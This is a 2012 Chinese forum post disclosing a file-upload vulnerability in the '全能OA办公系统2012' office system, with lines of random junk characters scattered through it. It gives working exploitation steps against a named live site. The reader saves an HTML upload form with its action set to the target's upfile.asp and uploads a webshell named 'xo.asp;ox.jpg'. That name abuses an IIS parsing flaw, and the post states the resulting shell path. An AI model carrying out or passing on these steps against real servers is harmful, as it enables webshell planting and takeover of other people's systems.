全能OA办公系统 上传漏洞
! [# b! p+ z2 X8 F" Q0 F
5 P! r- I* N, ?! R2 z- x9 _系统介绍:
7 R$ L" S6 Q1 h% p! W$ @' ^- f
( c# Q ]. w( I7 n全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
8 T7 |' O- i" k7 r4 T8 I1 P+ V' I
& z. O+ A' V6 L; s! E, `0 [主要功能:8 c6 z; I! _+ L- g& |* J7 J( [1 {0 }
公司通告 ! q: |2 o; Z5 P ~# h T
工作计划
( J+ j# Z! Q4 T& w% b" m通讯助理 3 W. p$ t' q8 a, A- {- L
客户资源 ! b! B. I: C) l. H: X; B }" m* V
我的公文
5 s3 y6 @& N$ g7 `& F公文传阅
6 E# O: k9 Q" K7 D* }) G6 q公共资源 ( n5 s4 _4 [! z* {
资源预约
# M* {( B# U3 L) ?7 z今日考勤
/ V% N6 J& f5 W# w个人计划
7 a# m4 u* L& D, t; e$ T个人通讯录 # r- B% W$ R# q; c$ i
个人基本档案
" x2 w1 `& d% Q( i* w0 ]0 l2 N& ~未读邮件
! V$ l2 J# q: [, H9 Z发邮件 % X" e7 ~% z) q+ n" m
收件夹
5 [ v. B B# L: Q1 u" ~3 _' Q寄件夹 b7 o& G" Q9 v: \, @: y& D
网络硬盘 ! d/ _; z! b5 w7 x! D
网络会议
* g- Z* P0 J' a8 p& ?2 E% c网络调查
5 o0 G" ~1 j' i. x. s0 T1 b交流论坛. \1 p5 T1 X) O7 q
8 @, c, y8 k% \/ Q4 ]' o有兴趣测试的朋友可以下源码看看
0 ^5 J$ s5 G' T
0 b I% [* J g% L源码下载:
/ z* Z6 F9 p6 n; D' B, j) S3 p4 x1 Q" O5 a3 o
http://www.mycodes.net/30/4750.htm
, }+ y2 Y0 t$ p! v; Y1 _
1 g8 Q3 `/ I8 _7 n- C漏洞介绍:- `- p9 A0 P% M$ q- n2 G6 ?
3 q8 R$ G( d! z+ P由upfile.asp上传文件漏洞引起
: E" r2 e, M' U! e g+ |- L, |+ k
$ q) y( P, w1 m% P' K测试方法:* \0 u j0 v: g1 R
" [% ^/ y/ j1 B0 I0 x- w5 f使用名小子上传http://www.itlynn.com/upfile.asp即可. T @) p7 |$ G4 r) N& g
& N" h& O# q9 u8 ]( t7 t( A/ v; R: U
如果upfile.asp文件被删除不存在。0 [, L& a, `+ M- C1 p0 W/ S
# X' e: K, J! j, c 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
4 a8 ~6 K' c! L6 t8 A8 F, z2 S4 O; e" u: Y. P! X
如果存在那么将如下代码保存为upfile.html。8 A# W$ r0 D( a" ]4 _6 }
3 T3 ^. _. ~6 ~
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。' @. Z5 u+ b8 ~% F" B* X; a
; y, `: t0 r2 x3 h" n
" g" @7 S; S% t
% i* I: G0 G* N4 d8 k' ~/ O6 |3 R01 <table border='0' align="center" cellpadding="5"> ( q. [1 |: [+ C# U
- V( m) |( G+ }
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> " T' b1 K# b0 e% j4 n& \
; q4 q" c. S6 V. D* e0 A
03 <tr> ) Z5 C. k3 u6 s6 ~$ Z: g/ y8 ]
# C5 t3 T2 i4 g% D" G7 s
04 <td>报错:</td>
( }0 j4 x3 {8 C
# i9 Y1 I0 }5 e( q05 <td><input type='radio' name='errnumber' value='0'>
. Q w4 r6 }+ o# \. j# T
; S _+ \# A. {- i( a2 [. J3 L06 自动更名
, ?5 v/ x9 V# Q( F7 z4 Q c
2 [5 F% x* \: i8 e0 r/ o0 c% B: Y07 <input type='radio' name='errnumber' value='1' checked> 9 D' ^/ k, z& @7 X7 k# ~
) N7 `: O M2 G0 W5 w4 t
08 报错方式 / j: e% q, y5 n
; \0 C' j& A1 z2 g
09 <input type='radio' name='errnumber' value='2'> 1 [* s [% n6 [8 [. c
9 c5 D, F* I }# f10 直接覆盖</td> 4 E |4 {% b e3 [
" h* r& I* d# a3 O% I* M: [: k% J11 </tr> 9 @3 D: i }" v- W' }
, Q3 _. N# n% l; U. z# [! c12 <tr>
+ I: |; z! D& v2 x1 `2 _7 q8 \
: A O' Y3 _4 {3 ~7 g w& K5 G13 <td>主题:</td> 5 d6 z. J( A* A& v
$ m3 D" M/ Z' h& s4 z
14 <td><input type='text' name='filename' size='30'></td> * A4 K- ]: Z( Q; x/ Z
- B, g7 k/ F( ?, h# q
15 </tr>
' p2 R0 u1 c0 e5 K# s, p4 f3 }/ c0 d) A% ~# t {
16 <tr>
+ ]% h# W2 @1 r) K' j% h, B
4 Y' G3 M$ v' }" l17 <td>文件:</td> 2 O8 T# D5 b; A( G/ `7 n# k
# n/ `3 g' U2 R+ ^; L
18 <td><input type="file"name="fruit"size="30"></td> 5 R u7 g6 o) w7 s
1 m. i6 I" y/ L) Z1 ?6 u0 r19 </tr> 3 Y8 w; A( f& R% I, S! r
- \ G5 M7 B) P: ^20 <tr>
9 y5 J7 R$ [% K; A7 ]: y; h4 S4 e6 ^' e$ C3 Y
21 <td valign='top'>简介:</td> : e3 @! o0 ~; Q/ o* O" f+ L/ q
: K4 I0 B u2 V2 Y& U" p
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
% l& U4 U. ]" j# n% f/ B5 x
* n+ [5 S. m6 @( `7 n( o23 </tr>
$ V/ _9 C+ m4 n7 h9 ^
; C: E0 C p, c% z5 o( I; _24 , d! n: u1 g# b( C! c
8 G5 f: h& i" u6 |0 W1 G
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> - Y( P" N* R% q1 ^, |
' J$ Q# m0 Y( E' l! Y
26 </tr> , ~' N0 s3 I, u0 [( e6 s6 n1 v @- x
& U% X/ |, m$ Z3 e, K' T27 </form> 4 V7 Q3 U) f; Z9 t/ U4 s9 U( v
* ?5 q$ H& K( T r+ E
然后打开上传一个文件名为xo.asp;ox.jpg的文件。! h1 g# L1 N# G. N3 v$ E& t7 }* m
. s. ^7 ]. g+ Z: J8 v
0 F7 E9 D1 Z, V5 K/ P, U- y
0 d& V5 Y1 w$ p8 V8 U1 z9 T9 z上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
" j( U3 O _+ Q0 |2 m& s2 R6 U3 ^6 a, b/ U, i9 N
此漏洞需要配合解析漏洞利用。; F2 Y F, W! W' D" n% e
7 W _/ x: G! r3 I
|
发表于 2012-11-21 13:45:12
收藏
支持
反对